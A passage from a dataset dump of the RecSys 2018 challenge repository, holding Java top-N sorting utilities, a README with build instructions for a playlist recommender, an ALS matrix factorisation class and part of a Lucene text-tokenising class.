exclusions) {\n\t\t\texclusionSet.add(exclusion);\n\t\t}\n\t\treturn topNSort(vec, topN, exclusionSet);\n\t}\n\n\tpublic static FloatElement[] topNSort(final float[] vec, final int topN,\n\t\t\tfinal Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<FloatElement>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i < vec.length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().value < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSort(final FloatElement[] vec,\n\t\t\tfinal int topN, final Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<FloatElement>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i < vec.length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tFloatElement element = vec[i];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(element);\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().value < element.getValue()) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(element);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSortArr(final FloatElement[] vec,\n\t\t\tfinal int topN, final int[] exclusions) {\n\t\tSet<Integer> exclusionSet = new HashSet<Integer>(exclusions.length);\n\t\tfor (int exclusion : exclusions) {\n\t\t\texclusionSet.add(exclusion);\n\t\t}\n\t\treturn topNSort(vec, topN, exclusionSet);\n\t}\n\n\tpublic static FloatElement[] topNSortOffset(final float[] vec, int topN,\n\t\t\tfinal int offset, final int length, Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i < length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i + offset];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().getValue() < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSortOffset(final float[] vec, int topN,\n\t\t\tint[] exclusionSorted, final int offset, final int length) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<>(topN,\n\t\t\t\tvalAscending);\n\n\t\tint skipping = exclusionSorted == null ? -1 : exclusionSorted[0];\n\t\tint skippingCur = 0;\n\t\tfinal int exclusionEnd = exclusionSorted == null ? 0\n\t\t\t\t: exclusionSorted.length;\n\t\tfor (int i = 0; i < length; i++) {\n\t\t\tif (i == skipping) {\n\t\t\t\tskippingCur++;\n\t\t\t\tif (skippingCur < exclusionEnd) {\n\t\t\t\t\tskipping = exclusionSorted[skippingCur];\n\t\t\t\t} else {\n\t\t\t\t\tskipping = -1;\n\t\t\t\t}\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i + offset];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().getValue() < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n}\n" }, { "alpha_fraction": 0.7252691984176636, "alphanum_fraction": 0.7598296999931335, "avg_line_length": 51.52631759643555, "blob_id": "57aeb01ee432b7718907c5cee7a3b881140ddde1", "content_id": "00aebb8307bb6e41823775746faed17d9d364602", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3993, "license_type": "permissive", "max_line_length": 476, "num_lines": 76, "path": "/README.md", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n<a href=\"https://layer6.ai/\"><img src=\"https://github.com/layer6ai-labs/DropoutNet/blob/master/logs/logobox.jpg\" width=\"120\" height=\"70\"></a>\n<a href=\"https://www.utoronto.ca//\"><img src=\"https://github.com/layer6ai-labs/vl6_recsys2018/blob/master/logos/UofT.jpg\" width=\"120\" height=\"70\"></a>\n<a href=\"https://vectorinstitute.ai/\"><img src=\"https://github.com/layer6ai-labs/vl6_recsys2018/blob/master/logos/vector.jpg\" width=\"120\" height=\"70\"></a>\n</p>\n\n## 2018 ACM RecSys Challenge 1'st Place Solution From Team vl6 \n\n**Team members**: Maksims Volkovs (Layer 6), Himanshu Rai (Layer 6), Zhaoyue Cheng (Layer 6), Yichao Lu (University of Toronto), Ga Wu (University of Toronto, Vector Institute), Scott Sanner (University of Toronto, Vector Institute) \n[[paper](http://www.cs.toronto.edu/~mvolkovs/recsys2018_challenge.pdf)][[challenge](http://www.recsyschallenge.com/2018)]\n\nContact: [email protected]\n\n<a name=\"intro\"/>\n\n## Introduction\nThis repository contains the Java implementation of our entries for both main and creative tracks. Our approach \nconsists of a two-stage model where in the first stage a blend of collaborative filtering methods is used to \nquickly retrieve a set of candidate songs for each playlist with high recall. Then in the second stage a pairwise \nplaylist-song gradient boosting model is used to re-rank the retrieved candidates and maximize precision at the \ntop of the recommended list.\n\n<a name=\"env\"/>\n\n## Environment\nThe model is implemented in Java and tested on the following environment:\n* Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz\n* 256GB RAM\n* Nvidia Titan V\n* Java Oracle 1.8.0_171\n* Python, Numpy 1.14.3, Sklearn 0.19.1, Scipy 1.1.0\n* Apache Maven 3.3.9\n* CUDA 8.0 and CUDNN 8.0\n* Intel MKL 2018.1.038\n* XGBoost and XGBoost4j 0.7\n\n<a name=\"dataset\"/>\n\n## Executing\n\nAll models are executed from `src/main/java/main/Executor.java`, the main function has examples on \nhow to do main and creative track model training, evaluation and submission. To run the model:\n\n* Set all paths:\n```\n//OAuth token for spotify creative api, if doing creative track submission\nString authToken = \"\";\n\n// path to song audio feature file, if doing creative track submission\nString creativeTrackFile = \"/home/recsys2018/data/song_audio_features.txt\";\n\n// path to MPD directory with the JSON files\nString trainPath = \"/home/recsys2018/data/train/\";\n\n// path to challenge set JSON file\nString testFile = \"/home/recsys2018/data/test/challenge_set.json\";\n\n// path to python SVD script included in the repo, default location: script/svd_py.py\nString pythonScriptPath = \"/home/recsys2018/script/svd_py.py\";\n\n//path to cache folder for temp storage, at least 20GB should be available in this folder\nString cachePath = \"/home/recsys2018/cache/\";\n```\n\n* Compile and execute with maven:\n```\nexport MAVEN_OPTS=\"-Xms150g -Xmx150g\"\nmvn clean compile\nmvn exec:java -Dexec.mainClass=\"main.Executor\" \n```\nNote that by default the code is executing model for the main track, to run the creative track model set `xgbParams.doCreative = true`. For the creative track we extracted extra song features from the \n[Spotify Audio API](https://developer.spotify.com/documentation/web-api/reference/tracks/get-several-audio-features/). We were able to match most songs from the challenge Million Playlist Dataset, and used the following fields for further feature extraction: `[acousticness, danceability, energy, instrumentalness, key, liveness, loudness, mode, speechiness, tempo, time_signature, valence]`. In order to download the data for this track, you need to get the OAuth Token from \n[Spotify API page](https://developer.spotify.com/console/get-audio-features-several-tracks/?ids=4JpKVNYnVcJ8tuMKjAj50A,2NRANZE9UCmPAS5XVbXL40,24JygzOLM0EmRQeGtFcIcG) and\nassign it to the `authToken` variable in the `Executor.main` function.\n\nWe prioritized speed over memory for this project so you'll need at least 100GB of RAM to run model training and inference. The full end-to-end runtime takes approximately 1.5 days.\n\n" }, { "alpha_fraction": 0.6224581003189087, "alphanum_fraction": 0.631683349609375, "avg_line_length": 28.825443267822266, "blob_id": "9e84ece419fc039fb163367f0fe751a4840a0e60", "content_id": "388d4b0551a60e036773446210985b68fcc52d75", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 10081, "license_type": "permissive", "max_line_length": 73, "num_lines": 338, "path": "/src/main/java/common/ALS.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.lang.reflect.Field;\nimport java.util.Arrays;\nimport java.util.Random;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class ALS {\n\n\tpublic static class ALSParams {\n\t\tpublic int maxIter = 10;\n\t\tpublic int rank = 200;\n\t\tpublic float alpha = 10f;\n\t\tpublic float lambda = 0.01f;\n\t\tpublic float init = 0.01f;\n\t\tpublic int seed = 1;\n\t\tpublic boolean evaluate = true;\n\t\tpublic boolean debug = true;\n\t\tpublic int printFrequency = 500_000;\n\n\t\t@Override\n\t\tpublic String toString() {\n\t\t\tStringBuilder result = new StringBuilder();\n\t\t\tString newLine = System.getProperty(\"line.separator\");\n\n\t\t\tresult.append(this.getClass().getName());\n\t\t\tresult.append(\" {\");\n\t\t\tresult.append(newLine);\n\n\t\t\t// determine fields declared in this class only (no fields of\n\t\t\t// superclass)\n\t\t\tField[] fields = this.getClass().getDeclaredFields();\n\n\t\t\t// print field names paired with their values\n\t\t\tfor (Field field : fields) {\n\t\t\t\tresult.append(\" \");\n\t\t\t\ttry {\n\t\t\t\t\tresult.append(field.getName());\n\t\t\t\t\tresult.append(\": \");\n\t\t\t\t\t// requires access to private field:\n\t\t\t\t\tresult.append(field.get(this));\n\t\t\t\t} catch (IllegalAccessException ex) {\n\t\t\t\t\tSystem.out.println(ex);\n\t\t\t\t}\n\t\t\t\tresult.append(newLine);\n\t\t\t}\n\t\t\tresult.append(\"}\");\n\n\t\t\treturn result.toString();\n\t\t}\n\n\t}\n\n\tprivate ALSParams params;\n\tprivate MLDenseMatrix U;\n\tprivate MLDenseMatrix V;\n\tprivate MLTimer timer;\n\n\tpublic ALS(final ALSParams paramsP) {\n\t\tthis.params = paramsP;\n\t\tthis.timer = new MLTimer(\"als\", this.params.maxIter);\n\t}\n\n\tpublic MLDenseMatrix getU() {\n\t\treturn this.U;\n\t}\n\n\tpublic MLDenseMatrix getV() {\n\t\treturn this.V;\n\t}\n\n\tpublic void optimize(final MLSparseMatrix R_train, final String outPath)\n\t\t\tthrows Exception {\n\n\t\tthis.timer.tic();\n\n\t\tMLSparseMatrix R_train_t = R_train.transpose();\n\t\tthis.timer.toc(\"obtained R Rt\");\n\n\t\t// randomly initialize U and V\n\t\tif (this.U == null) {\n\t\t\tthis.U = MLDenseMatrix.initRandom(R_train.getNRows(),\n\t\t\t\t\tthis.params.rank, this.params.init, this.params.seed);\n\t\t\tthis.timer.toc(\"initialized U\");\n\t\t}\n\n\t\tif (this.V == null) {\n\t\t\tthis.V = MLDenseMatrix.initRandom(R_train.getNCols(),\n\t\t\t\t\tthis.params.rank, this.params.init, this.params.seed);\n\t\t\tthis.timer.toc(\"initialized V\");\n\t\t}\n\n\t\tfor (int i = 0; i < R_train.getNRows(); i++) {\n\t\t\tif (R_train.getRow(i) == null) {\n\t\t\t\t// zero out cold start users\n\t\t\t\tthis.U.setRow(new MLDenseVector(new float[this.params.rank]),\n\t\t\t\t\t\ti);\n\t\t\t}\n\t\t}\n\t\tfor (int i = 0; i < R_train_t.getNRows(); i++) {\n\t\t\tif (R_train_t.getRow(i) == null) {\n\t\t\t\t// zero out cold start items\n\t\t\t\tthis.V.setRow(new MLDenseVector(new float[this.params.rank]),\n\t\t\t\t\t\ti);\n\t\t\t}\n\t\t}\n\n\t\tfor (int iter = 0; iter < this.params.maxIter; iter++) {\n\t\t\tthis.solve(R_train, this.U, this.V);\n\t\t\tthis.solve(R_train_t, this.V, this.U);\n\t\t\tthis.timer.toc(\"solver done\");\n\t\t\tthis.timer.toc(String.format(\"[iter %d] done\", iter));\n\t\t}\n\n\t\tif (outPath != null) {\n\t\t\tString uOutFile = outPath + \"U_\" + this.params.rank + \".bin\";\n\t\t\tString vOutFile = outPath + \"V_\" + this.params.rank + \".bin\";\n\n\t\t\tthis.U.toFile(uOutFile);\n\t\t\tthis.timer.toc(\"written U to \" + uOutFile);\n\n\t\t\tthis.V.toFile(vOutFile);\n\t\t\tthis.timer.toc(\"written V to \" + vOutFile);\n\t\t}\n\t}\n\n\tpublic void setU(final MLDenseMatrix Up) {\n\t\tthis.U = Up;\n\t}\n\n\tpublic void setV(final MLDenseMatrix Vp) {\n\t\tthis.V = Vp;\n\t}\n\n\tprivate MLDenseVector solve(final int targetIndex,\n\t\t\tfinal MLSparseMatrix data, final float[] H, final float[] HH,\n\t\t\tfinal float[] cache) {\n\t\tint[] rowIndexes = data.getRow(targetIndex).getIndexes();\n\t\tfloat[] values = data.getRow(targetIndex).getValues();\n\n\t\tfloat[] HC_minus_IH = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = 0;\n\t\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\t\tint offset = rowIndexes[k] * this.params.rank;\n\t\t\t\t\ttotal += H[offset + i] * H[offset + j] * values[k];\n\t\t\t\t}\n\t\t\t\tHC_minus_IH[i * this.params.rank + j] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t\tHC_minus_IH[j * this.params.rank + i] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t}\n\t\t}\n\t\t// create HCp in O(f|S_u|)\n\t\tfloat[] HCp = new float[this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfloat total = 0;\n\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\ttotal += H[rowIndexes[k] * this.params.rank + i]\n\t\t\t\t\t\t* (1 + this.params.alpha * values[k]);\n\t\t\t}\n\t\t\tHCp[i] = total;\n\t\t}\n\t\t// create temp = HH + HC_minus_IH + lambda*I\n\t\t// temp is symmetric\n\t\t// the inverse temp is symmetric\n\t\tfloat[] temp = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfinal int offset = i * this.params.rank;\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = HH[offset + j] + HC_minus_IH[offset + j];\n\t\t\t\tif (i == j) {\n\t\t\t\t\ttotal += this.params.lambda;\n\t\t\t\t}\n\t\t\t\ttemp[offset + j] = total;\n\t\t\t}\n\t\t}\n\n\t\tLowLevelRoutines.symmetricSolve(temp, this.params.rank, HCp, cache);\n\n\t\t// return optimal solution\n\t\treturn new MLDenseVector(HCp);\n\t}\n\n\tprivate MLDenseVector solve(final int targetIndex,\n\t\t\tfinal MLSparseMatrix data, final MLDenseMatrix H, final float[] HH,\n\t\t\tfinal float[] cache) {\n\t\tint[] rowIndexes = data.getRow(targetIndex).getIndexes();\n\t\tfloat[] values = data.getRow(targetIndex).getValues();\n\n\t\tfloat[] HC_minus_IH = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = 0;\n\t\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\t\ttotal += H.getValue(rowIndexes[k], i)\n\t\t\t\t\t\t\t* H.getValue(rowIndexes[k], j) * values[k];\n\t\t\t\t}\n\t\t\t\tHC_minus_IH[i * this.params.rank + j] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t\tHC_minus_IH[j * this.params.rank + i] = total\n\t\t\t\t\t\t* this.params.alpha;\n\t\t\t}\n\t\t}\n\t\t// create HCp in O(f|S_u|)\n\t\tfloat[] HCp = new float[this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfloat total = 0;\n\t\t\tfor (int k = 0; k < rowIndexes.length; k++) {\n\t\t\t\ttotal += H.getValue(rowIndexes[k], i)\n\t\t\t\t\t\t* (1 + this.params.alpha * values[k]);\n\t\t\t}\n\t\t\tHCp[i] = total;\n\t\t}\n\t\t// create temp = HH + HC_minus_IH + lambda*I\n\t\t// temp is symmetric\n\t\t// the inverse temp is symmetric\n\t\tfloat[] temp = new float[this.params.rank * this.params.rank];\n\t\tfor (int i = 0; i < this.params.rank; i++) {\n\t\t\tfinal int offset = i * this.params.rank;\n\t\t\tfor (int j = i; j < this.params.rank; j++) {\n\t\t\t\tfloat total = HH[offset + j] + HC_minus_IH[offset + j];\n\t\t\t\tif (i == j) {\n\t\t\t\t\ttotal += this.params.lambda;\n\t\t\t\t}\n\t\t\t\ttemp[offset + j] = total;\n\t\t\t}\n\t\t}\n\n\t\tLowLevelRoutines.symmetricSolve(temp, this.params.rank, HCp, cache);\n\n\t\t// return optimal solution\n\t\treturn new MLDenseVector(Arrays.copyOf(HCp, this.params.rank));\n\t}\n\n\tprivate void solve(final MLSparseMatrix data, final MLDenseMatrix W,\n\t\t\tfinal MLDenseMatrix H) {\n\n\t\tint cacheSize = LowLevelRoutines.symmInverseCacheSize(\n\t\t\t\tnew float[this.params.rank * this.params.rank],\n\t\t\t\tthis.params.rank);\n\t\t// float[] cache = new float[cacheSize];\n\t\tMLConcurrentUtils.Async<float[]> cache = new MLConcurrentUtils.Async<>(\n\t\t\t\t() -> new float[cacheSize], null);\n\t\tMLTimer timer = new MLTimer(\"als\", data.getNRows());\n\t\ttimer.tic();\n\n\t\t// compute H_t * H\n\t\tMLDenseMatrix HH = H.transposeMultNative();\n\t\tfloat[] HHflat = HH.toFlatArray();\n\t\tif (this.params.debug) {\n\t\t\ttimer.toc(\"HH done\");\n\t\t}\n\n\t\tboolean[] useFlat = new boolean[] { false };\n\t\tfloat[][] Hflat = new float[1][];\n\t\tif (H.getNRows() < LowLevelRoutines.MAX_ARRAY_SIZE / H.getNCols()) {\n\t\t\t// no overflow so use flat version\n\t\t\tuseFlat[0] = true;\n\t\t\tHflat[0] = H.toFlatArray();\n\t\t\tif (this.params.debug) {\n\t\t\t\ttimer.toc(\"H to flat done\");\n\t\t\t}\n\t\t} else {\n\t\t\tSystem.out.println(\"WARNING: not using flat H\");\n\t\t}\n\n\t\tint[] rowIndices = new int[data.getNRows()];\n\t\tfor (int i = 0; i < data.getNRows(); i++) {\n\t\t\trowIndices[i] = i;\n\t\t}\n\t\tMLRandomUtils.shuffle(rowIndices, new Random(1));\n\t\tAtomicInteger counter = new AtomicInteger(0);\n\t\tIntStream.range(0, rowIndices.length).parallel().forEach(i -> {\n\t\t\tint count = counter.incrementAndGet();\n\t\t\tif (this.params.debug && count % this.params.printFrequency == 0) {\n\t\t\t\ttimer.tocLoop(count);\n\t\t\t}\n\t\t\tint rowIndex = rowIndices[i];\n\t\t\tif (data.getRow(rowIndex) == null) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tMLDenseVector solution;\n\t\t\tif (useFlat[0] == true) {\n\t\t\t\tsolution = solve(rowIndex, data, Hflat[0], HHflat, cache.get());\n\t\t\t} else {\n\t\t\t\tsolution = solve(rowIndex, data, H, HHflat, cache.get());\n\t\t\t}\n\n\t\t\tW.setRow(solution, rowIndex);\n\t\t});\n\t\tif (this.params.debug) {\n\t\t\ttimer.tocLoop(counter.get());\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tMLDenseMatrix V = new MLDenseMatrix(\n\t\t\t\tnew MLDenseVector[] { new MLDenseVector(new float[] { 1, 2 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 3, 4 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 5, 6 }) });\n\t\tMLDenseMatrix U = new MLDenseMatrix(\n\t\t\t\tnew MLDenseVector[] { new MLDenseVector(new float[] { 1, -2 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 3, -4 }),\n\t\t\t\t\t\tnew MLDenseVector(new float[] { 5, -6 }) });\n\n\t\tMLSparseVector[] test = new MLSparseVector[3];\n\t\ttest[0] = new MLSparseVector(new int[] { 0, 1 }, new float[] { 1, 1 },\n\t\t\t\tnull, 3);\n\t\ttest[1] = new MLSparseVector(new int[] { 0, 1, 2 },\n\t\t\t\tnew float[] { 1, 1, 1 }, null, 3);\n\t\ttest[2] = new MLSparseVector(new int[] { 1, 2 }, new float[] { 1, 1 },\n\t\t\t\tnull, 3);\n\t\tMLSparseMatrix R = new MLSparseMatrixAOO(test, 3);\n\t\tMLSparseMatrix RT = new MLSparseMatrixAOO(test, 3);\n\n\t\tALSParams params = new ALSParams();\n\t\tparams.maxIter = 1;\n\t\tparams.rank = 2;\n\t\tparams.lambda = 0f;\n\n\t\tALS als = new ALS(params);\n\t\tals.solve(R, U, V);\n\t\tals.solve(RT, V, U);\n\n\t\tSystem.out.println(\"U\");\n\t\tSystem.out.println(Arrays.toString(U.getRow(0).getValues()));\n\t\tSystem.out.println(Arrays.toString(U.getRow(1).getValues()));\n\t\tSystem.out.println(Arrays.toString(U.getRow(2).getValues()));\n\t\tSystem.out.println(\"\\nV\");\n\t\tSystem.out.println(Arrays.toString(V.getRow(0).getValues()));\n\t\tSystem.out.println(Arrays.toString(V.getRow(1).getValues()));\n\t\tSystem.out.println(Arrays.toString(V.getRow(2).getValues()));\n\t}\n}\n" }, { "alpha_fraction": 0.7043249607086182, "alphanum_fraction": 0.7227162718772888, "avg_line_length": 26.186813354492188, "blob_id": "d65902a479095f7390eebe3201ea37a33b2057cd", "content_id": "8c317cdbfb4afbd69f48fe96fe3fd8c02a48c725", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4948, "license_type": "permissive", "max_line_length": 113, "num_lines": 182, "path": "/src/main/java/common/MLTextTransform.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.IOException;\nimport java.io.Serializable;\nimport java.io.StringReader;\nimport java.util.HashMap;\nimport java.util.LinkedList;\nimport java.util.List;\nimport java.util.Map;\n\nimport org.apache.lucene.analysis.Analyzer;\nimport org.apache.lucene.analysis.LowerCaseFilter;\nimport org.apache.lucene.analysis.TokenStream;\nimport org.apache.lucene.analysis.Tokenizer;\nimport org.apache.lucene.analysis.core.WhitespaceTokenizer;\nimport org.apache.lucene.analysis.miscellaneous.ASCIIFoldingFilter;\nimport org.apache.lucene.analysis.tokenattributes.CharTermAttribute;\nimport org.apache.lucene.analysis.miscellaneous.WordDelimiterGraphFilterFactory;\nimport org.apache.lucene.analysis.ngram.NGramTokenFilter;\n\npublic abstract class MLTextTransform implements Serializable {\n\n\tpublic static class DefaultAnalyzer extends Analyzer\n\t\t\timplements Serializable {\n\t\tprivate static final long serialVersionUID = 8662472589510750438L;\n\n\t\t@Override\n\t\tprotected TokenStreamComponents createComponents(\n\t\t\t\tfinal String fieldName) {\n\t\t\ttry {\n\t\t\t\tTokenizer tokenizer = new WhitespaceTokenizer();\n\n\t\t\t\tMap<String, String> args = new HashMap<String, String>();\n\t\t\t\targs.put(\"catenateAll\", \"0\");\n\t\t\t\targs.put(\"generateNumberParts\", \"1\");\n\t\t\t\targs.put(\"generateWordParts\", \"1\");\n\t\t\t\targs.put(\"splitOnCaseChange\", \"1\");\n\t\t\t\targs.put(\"splitOnNumerics\", \"1\");\n\n\t\t\t\tWordDelimiterGraphFilterFactory factory = new WordDelimiterGraphFilterFactory(\n\t\t\t\t\t\targs);\n\t\t\t\tTokenStream filter = factory.create(tokenizer);\n\n\t\t\t\tfilter = new LowerCaseFilter(filter);\n\n\t\t\t\tfilter = new ASCIIFoldingFilter(filter);\n\n\t\t\t\treturn new TokenStreamComponents(tokenizer, filter);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\te.printStackTrace();\n\t\t\t}\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static class DefaultNGRAMAnalyzer extends Analyzer\n\t\t\timplements Serializable {\n\n\t\tprivate static final long serialVersionUID = 2224016723762685329L;\n\t\t// https://lucene.apache.org/core/7_0_0/analyzers-common/org/apache/lucene/analysis/ngram/NGramTokenFilter.html\n\t\tprivate int minGram;\n\t\tprivate int maxGram;\n\n\t\tpublic DefaultNGRAMAnalyzer(final int minGraP, final int maxGramP) {\n\t\t\tthis.minGram = minGraP;\n\t\t\tthis.maxGram = maxGramP;\n\t\t}\n\n\t\t@Override\n\t\tprotected TokenStreamComponents createComponents(\n\t\t\t\tfinal String fieldName) {\n\t\t\ttry {\n\t\t\t\tTokenizer tokenizer = new WhitespaceTokenizer();\n\n\t\t\t\tMap<String, String> args = new HashMap<String, String>();\n\t\t\t\targs.put(\"catenateAll\", \"0\");\n\t\t\t\targs.put(\"generateNumberParts\", \"1\");\n\t\t\t\targs.put(\"generateWordParts\", \"1\");\n\t\t\t\targs.put(\"splitOnCaseChange\", \"1\");\n\t\t\t\targs.put(\"splitOnNumerics\", \"1\");\n\n\t\t\t\tWordDelimiterGraphFilterFactory factory = new WordDelimiterGraphFilterFactory(\n\t\t\t\t\t\targs);\n\t\t\t\tTokenStream filter = factory.create(tokenizer);\n\n\t\t\t\tfilter = new LowerCaseFilter(filter);\n\n\t\t\t\tfilter = new ASCIIFoldingFilter(filter);\n\n\t\t\t\tfilter = new NGramTokenFilter(filter, this.minGram,\n\t\t\t\t\t\tthis.maxGram);\n\n\t\t\t\treturn new TokenStreamComponents(tokenizer, filter);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\te.printStackTrace();\n\t\t\t}\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static class LuceneAnalyzerTextTransform extends MLTextTransform {\n\n\t\tprivate static final long serialVersionUID = 1843607513745972795L;\n\t\tprivate Analyzer analyzer;\n\n\t\tpublic LuceneAnalyzerTextTransform(final Analyzer analyzerP) {\n\t\t\tthis.analyzer = analyzerP;\n\t\t}\n\n\t\t@Override\n\t\tpublic void apply(final MLTextInput input) {\n\t\t\ttry {\n\t\t\t\tList<String> tokens = passThroughAnalyzer(input.text,\n\t\t\t\t\t\tthis.analyzer);\n\t\t\t\tString[] tokenized = new String[tokens.size()];\n\t\t\t\tint cur = 0;\n\t\t\t\tfor (String token : tokens) {\n\t\t\t\t\ttokenized[cur] = token;\n\t\t\t\t\tcur++;\n\t\t\t\t}\n\t\t\t\tinput.setTokenized(tokenized);\n\n\t\t\t} catch (Exception e) {\n\t\t\t\tthrow new RuntimeException(e.getMessage());\n\t\t\t}\n\t\t}\n\n\t\tpublic static List<String> passThroughAnalyzer(final String input,\n\t\t\t\tfinal Analyzer analyzer) throws IOException {\n\t\t\tTokenStream tokenStream = null;\n\t\t\ttry {\n\t\t\t\ttokenStream = analyzer.tokenStream(null,\n\t\t\t\t\t\tnew StringReader(input));\n\t\t\t\tCharTermAttribute termAtt = tokenStream\n\t\t\t\t\t\t.addAttribute(CharTermAttribute.class);\n\t\t\t\ttokenStream.reset();\n\t\t\t\tList<String> tokens = new LinkedList<String>();\n\t\t\t\twhile (tokenStream.incrementToken()) {\n\t\t\t\t\tString term = termAtt.toString().trim();\n\t\t\t\t\tif (term.length() > 0) {\n\t\t\t\t\t\ttokens.add(term);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttokenStream.end();\n\n\t\t\t\treturn tokens;\n\t\t\t} finally {\n\t\t\t\tif (tokenStream != null) {\n\t\t\t\t\ttokenStream.close();\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static class MLTextInput {\n\n\t\tprivate String text;\n\t\tprivate String[] tokenized;\n\n\t\tpublic MLTextInput(final String textP) {\n\t\t\tthis.text = textP;\n\t\t}\n\n\t\tpublic String getText() {\n\t\t\treturn this.text;\n\t\t}\n\n\t\tpublic String[] getTokenized() {\n\t\t\treturn this.tokenized;\n\t\t}\n\n\t\tpublic void setTokenized(final String[] tokenizedP) {\n\t\t\tthis.tokenized = 